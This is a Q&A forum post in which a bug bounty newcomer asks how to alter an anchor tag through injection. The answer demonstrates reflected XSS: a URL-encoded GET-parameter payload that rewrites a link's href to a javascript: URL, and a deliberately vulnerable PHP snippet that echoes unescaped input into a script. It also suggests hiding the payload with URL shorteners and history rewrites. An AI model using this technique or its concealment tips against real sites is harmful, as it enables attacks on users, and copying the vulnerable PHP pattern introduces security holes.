[SOLVED] How can I change the contents of an anchor tag with the aim of performing a CSRF attack?

How can I change the contents of an anchor tag with the aim of performing a CSRF attack?

I am new at bug bounty programs and I think I have found a vulnerability in one of the site that I am working on. My concern is that I still do not know how to change the content of an anchor tag to reflect on the website permanently. Any feedback is highly appreciated.

Solution

I should note that, from a purely front-end perspective it is not possible to make permanent changes to a web page. However, you can leverage URL Shortners like TinyURL or Bit.ly to mask your injection, you can also use history rewrites to hide your injection payloads from targets.

From a Front-End JavaScript perspective, it's pretty simple. Using our injection point as the attack vector, we need to override the front-end element's href or onclick attributes.

Simple example of overriding onclick and href attributes on anchor tag within StackOverflow

const t = document.querySelector("#arbitraryId");
t.href="javascript:alert(0);"

<a id="arbitraryId" href="https://google.com" target="_BLANK">Click Me</a>

Using the above snippet example, we can urlencode the payload and add it to our attack vector (a GET parameter) which would look like this;

https://some.where/?arbitraryAttackVector=%27%3Bconst%20t%20%3D%20document.querySelector%28%27%23arbitraryId%27%29%3Bt.href%3D%27javascript%3Aalert%280%29%3B%20%2F%2F%20comment

Decodes as:

https://some.where/?arbitraryAttackVector=';const t = document.querySelector('#arbitraryId');t.href='javascript:alert(0); // comment

Note: This is for injecting into an element which would have its underlining code as such;

<?php

$injectionPayload = $_GET['arbitraryAttackVector']; // Vulnerable portion in SSR.

echo <<<EOF
<a id="arbitraryId" href="https://google.com">Click Here</a>
<ul id="listId"></ul>

<script>
  const list = document.querySelector('#listId');
  const el = document.createElement('li');
  el.innerText = '{$injectionPayload}'; <!-- Vulnerable portion injected into arbitrary string in SSR. -->
  list.appendChild(el);
</script>
EOF;

  // EOF;

And this is how the page would be rendered via SSR;

<a id="arbitraryId" href="https://google.com">Click Here</a>
<ul id="listId"></ul>

<script>
    const list = document.querySelector('#listId');
    const el = document.createElement('li');
    el.innerText = '';const t = document.querySelector('#arbitraryId');t.href='javascript:alert(0); // comment'; <!-- Vulnerable portion injected into arbitrary string in SSR. -->
    list.appendChild(el);
</script>

Zooming in on just the script portion;

const list = document.querySelector('#listId');
    const el = document.createElement('li');
    el.innerText = '';const t = document.querySelector('#arbitraryId');t.href='javascript:alert(0); // comment'; <!-- Vulnerable portion injected into arbitrary string in SSR. -->
    list.appendChild(el);

You can read more on XSS here: https://xss.js.org/